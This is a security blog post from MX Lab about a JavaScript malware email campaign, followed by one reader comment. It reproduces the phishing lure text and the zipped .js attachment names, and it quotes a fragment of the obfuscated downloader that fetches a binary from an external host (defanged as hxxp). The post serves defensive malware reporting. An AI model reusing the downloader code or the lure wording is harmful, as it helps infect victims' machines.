New Javascript malware in emails with subject “Re:”


MX Lab, http://www.mxlab.eu, started to intercept a new malware distribution campaign by email with the subject “Re:”.

This email is send from the spoofed addresses and has the following body:

Good evening Harris,

As promised, I have attached the spreadsheet contains last 50 transaction and your account actual balance.

Regards,

Pauline Hughes

The attached file details_xls_A72.zip contains the folder  details_xls_A72 with the following files:

transactions 29871684.js
transactions 29871684 – copy.js
transactions 29871684 – copy (2).js

The malware is detected by 10/55 AV engines at Virus Total.

Analysis of a part of the obfuscated Javascript – Atlantic1[nYou](“G\x45T”, “ht”+”tp”+”:/”+”/so”+”co”+”dec”+”o.”+”co”+”m/”+”u3″+”ijk”+”s”, false); – shows that a malicious file will be downloaded from the location hxxp://socodeco.com/u3ijks. The detailed Malwr analysis confirms this as well. A malicious file will be downloaded from this location as a binary file.

The malware is detected by 3/55 AV engines at Virus Total and the analysis is available on Malwr.

Note that the filenames of the ZIP archive, the extracted folder and the decompressed files may vary with each email.

One thought on “New Javascript malware in emails with subject “Re:”

  1. Hi, I received an email from a Roderick Hardy (HardyRoderick2099@40-46 dot nastech dot bg) subject line Re: with an attachment (that I did not open and would strongly advise no one to open this file)
    credit memos_0C34AE12 then dot zip (6.46KB)
    I am fairly certain that this is a “ransom” type of virus but not sure.
    Could anyone there tell me if this is a “ransom” type of virus or has anyone else seen this yet?
    Also, is this about the right size file for this virus?
    Thank you,
    Herman Wolff

Comments are closed.